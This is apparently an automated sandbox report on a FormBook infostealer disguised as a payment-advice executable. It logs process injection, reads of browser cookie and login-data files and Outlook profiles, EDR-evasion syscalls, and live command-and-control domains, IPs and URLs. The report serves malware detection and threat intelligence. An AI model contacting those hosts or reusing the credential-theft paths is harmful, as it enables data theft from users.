            Source: eYlgnnKYnAjqSS.exe, 00000005.00000002.2959229349.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000000.2255964159.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409609172.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PAYMENT ADVISE#9879058.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: PAYMENT ADVISE#9879058.exeBinary or memory string: WIN_XP
            Source: PAYMENT ADVISE#9879058.exeBinary or memory string: WIN_XPe
            Source: PAYMENT ADVISE#9879058.exeBinary or memory string: WIN_VISTA
            Source: PAYMENT ADVISE#9879058.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager1
            System Network Connections Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS2
            File and Directory Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets116
            System Information Discovery            		SSH2
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials241
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync2
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            System Network Configuration Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530635 Sample: PAYMENT ADVISE#9879058.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 28 www.wcq24.top 2->28 30 www.healtpro.top 2->30 32 5 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 8 other signatures 2->48 10 PAYMENT ADVISE#9879058.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 eYlgnnKYnAjqSS.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 NETSTAT.EXE 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 eYlgnnKYnAjqSS.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.healtpro.top 203.161.43.245, 50003, 50004, 50005 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 wcq24.top 154.23.184.240, 50011, 80 COGENT-174US United States 22->36 38 2 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PAYMENT ADVISE#9879058.exe26%ReversingLabsWin32.Trojan.Generic
            PAYMENT ADVISE#9879058.exe29%VirustotalBrowse
            PAYMENT ADVISE#9879058.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.b5x7vk.agency1%VirustotalBrowse
            chalet-tofane.net8%VirustotalBrowse
            wcq24.top2%VirustotalBrowse
            www.bonusgame2024.online0%VirustotalBrowse
            www.chalet-tofane.net2%VirustotalBrowse
            www.wcq24.top2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.wcq24.top2%VirustotalBrowse
            http://www.healtpro.top/fes8/1%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.b5x7vk.agency
            		104.21.11.31
            		truetrueunknown
            chalet-tofane.net
            		62.149.128.40
            		truetrueunknown
            wcq24.top
            		154.23.184.240
            		truetrueunknown
            www.healtpro.top
            		203.161.43.245
            		truetrue
              		unknown
              www.wcq24.top
              		unknown
              		unknowntrueunknown
              www.bonusgame2024.online
              		unknown
              		unknowntrueunknown
              www.chalet-tofane.net
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.b5x7vk.agency/3rsv/true
                		unknown
                http://www.b5x7vk.agency/3rsv/?xNv=xIX+WL4Gosls7mMvG39YjczwIlc5FH+9QHTcqjrnYPts9+3MRA8haYPK8pqgYSQnqVoX+MtR4yK2qH2ERM2vlkvqHJkEK2jfahGH5woqObRGQGud+bD1SW8=&xh-d=eNF4ktDXSL5XRvotrue
                  		unknown
                  http://www.healtpro.top/fes8/trueunknown
                  http://www.chalet-tofane.net/w5h3/?xNv=1SmCwmpOaIYJfuspvbmYENxQiVuKofAafkRqArhwQnoekPS2kKO+Sw+l3ZpIkD6/zHiqkZCr31NVHRkc0KhHMBZH6coriNZLnk7PgxLNtl8YZG6QQCHD2lU=&xh-d=eNF4ktDXSL5XRvotrue
                    		unknown
                    http://www.wcq24.top/4jol/true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ac.ecosia.org/autocomplete?q=NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabNETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoNETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.wcq24.topeYlgnnKYnAjqSS.exe, 00000007.00000002.2959379992.00000000011FD000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                      https://www.ecosia.org/newtab/NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.chalet-tofane.net:80/w5h3/?xNv=1SmCwmpOaIYJfuspvbmYENxQiVuKofAafkRqArhwQnoekPS2kKONETSTAT.EXE, 00000006.00000002.2960171619.00000000044C6000.00000004.10000000.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000002.2959969175.00000000035D6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2687690315.000000001AA26000.00000004.80000000.00040000.00000000.sdmptrue
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        62.149.128.40
                        		chalet-tofane.netItaly
                        		31034ARUBA-ASNITtrue
                        203.161.43.245
                        		www.healtpro.topMalaysia
                        		45899VNPT-AS-VNVNPTCorpVNtrue
                        104.21.11.31
                        		www.b5x7vk.agencyUnited States
                        		13335CLOUDFLARENETUStrue
                        154.23.184.240
                        		wcq24.topUnited States
                        		174COGENT-174UStrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1530635
                        Start date and time:2024-10-10 10:05:56 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 24s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:PAYMENT ADVISE#9879058.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@7/2@5/4
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 91%
                        • Number of executed functions: 40
                        • Number of non-executed functions: 316
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:08:35API Interceptor34x Sleep call for process: NETSTAT.EXE modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        62.149.128.40Arrival notice.exeGet hashmaliciousFormBookBrowse
                        • www.chalet-tofane.net/vv4m/?7NP=7FXXUPl&EZ2lo=YHtjADYkxu7EjL2CugAOyFkd+FKjIe5l/QKXGaE9Itky6wrTEgv0uDMpgH/UthNzfFIQLoI7VSX8KaEEAmnqI9GcxpfDY6d99mE8V8mh5Ak2zhlphg==
                        SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                        • www.chalet-tofane.net/obbp/
                        List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.chalet-tofane.net/ytc6/
                        Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                        • www.chalet-tofane.net/uesf/
                        PO76389.exeGet hashmaliciousFormBookBrowse
                        • www.fimgroup.net/f3w9/
                        bintoday1.exeGet hashmaliciousFormBookBrowse
                        • www.fimgroup.net/m3ft/
                        Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                        • www.fimgroup.net/fqzh/
                        file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                        • www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
                        64MXEd79F1.exeGet hashmaliciousFormBookBrowse
                        • www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
                        09090.exeGet hashmaliciousFormBookBrowse
                        • www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
                        203.161.43.2457v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                        • www.fethmart.top/w9gq/
                        T9W7MCS2HI.exeGet hashmaliciousFormBookBrowse
                        • www.stayup.top/gubb/
                        UPDATED Q-LOT24038.exeGet hashmaliciousFormBookBrowse
                        • www.stayup.top/gubb/
                        RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                        • www.stayup.top/gubb/
                        inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                        • www.stayup.top/gubb/
                        HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                        • www.stayup.top/gubb/
                        Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                        • www.healtpro.top/fes8/
                        Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                        • www.fethmart.top/w9gq/
                        FYI.PDF.exeGet hashmaliciousFormBookBrowse
                        • www.healtpro.top/fes8/
                        PO098765678.exeGet hashmaliciousFormBookBrowse
                        • www.fethmart.top/w9gq/

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        www.healtpro.topPayment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                        • 203.161.43.245
                        FYI.PDF.exeGet hashmaliciousFormBookBrowse
                        • 203.161.43.245
                        www.b5x7vk.agency9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                        • 172.67.165.25
                        RQ#071024.exeGet hashmaliciousFormBookBrowse
                        • 104.21.11.31
                        Quote #260924.exeGet hashmaliciousFormBookBrowse
                        • 172.67.165.25
                        Quote #270924.exeGet hashmaliciousFormBookBrowse
                        • 172.67.165.25
                        PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                        • 172.67.165.25
                        rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                        • 104.21.11.31
                        Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                        • 172.67.165.25
                        DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                        • 104.21.11.31

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUS10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                        • 188.114.96.3
                        https://w7950.app.blinkops.comGet hashmaliciousUnknownBrowse
                        • 104.26.2.186
                        Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                        • 188.114.96.3
                        Inquiry N TM24-10-09.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                        • 104.21.53.112
                        hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                        • 104.21.56.70
                        Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 104.21.2.6
                        #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        • 188.114.97.3
                        Logistics1.vbsGet hashmaliciousFormBookBrowse
                        • 188.114.96.3
                        Quarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
                        • 104.17.25.14
                        https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                        • 104.16.117.116
                        VNPT-AS-VNVNPTCorpVNna.elfGet hashmaliciousMiraiBrowse
                        • 123.22.248.40
                        na.elfGet hashmaliciousMiraiBrowse
                        • 113.184.12.192
                        na.elfGet hashmaliciousUnknownBrowse
                        • 14.237.13.77
                        na.elfGet hashmaliciousUnknownBrowse
                        • 14.236.47.227
                        https://premierbb.sharefile.com/public/share/web-189361297164461cGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                        • 203.161.61.149
                        PO#001498.exeGet hashmaliciousFormBookBrowse
                        • 203.161.41.205
                        7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                        • 203.161.43.245
                        ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 203.161.46.205
                        8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                        • 103.255.237.233
                        na.elfGet hashmaliciousUnknownBrowse
                        • 14.172.101.50
                        ARUBA-ASNITHigh Court Summons Notice.pdfGet hashmaliciousUnknownBrowse
                        • 95.110.136.136
                        Arrival notice.exeGet hashmaliciousFormBookBrowse
                        • 62.149.128.40
                        na.elfGet hashmaliciousMiraiBrowse
                        • 31.14.139.69
                        novo.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                        • 95.110.195.186
                        SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                        • 62.149.128.40
                        https://h567268.linp067.arubabusiness.it/SI1892190290/amGet hashmaliciousUnknownBrowse
                        • 80.88.87.86
                        https://h567268.linp067.arubabusiness.it/SI1892190290/Get hashmaliciousUnknownBrowse
                        • 80.88.87.86
                        https://h567268.linp067.arubabusiness.it/BOKMANDOKL/am/infospage.phpGet hashmaliciousUnknownBrowse
                        • 80.88.87.86
                        https://terios.shop/Get hashmaliciousUnknownBrowse
                        • 217.61.13.96
                        w91DR2B3Pz.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 80.211.144.156

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\2023Ei4

                        Download File
                        Process:C:\Windows\SysWOW64\NETSTAT.EXE
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
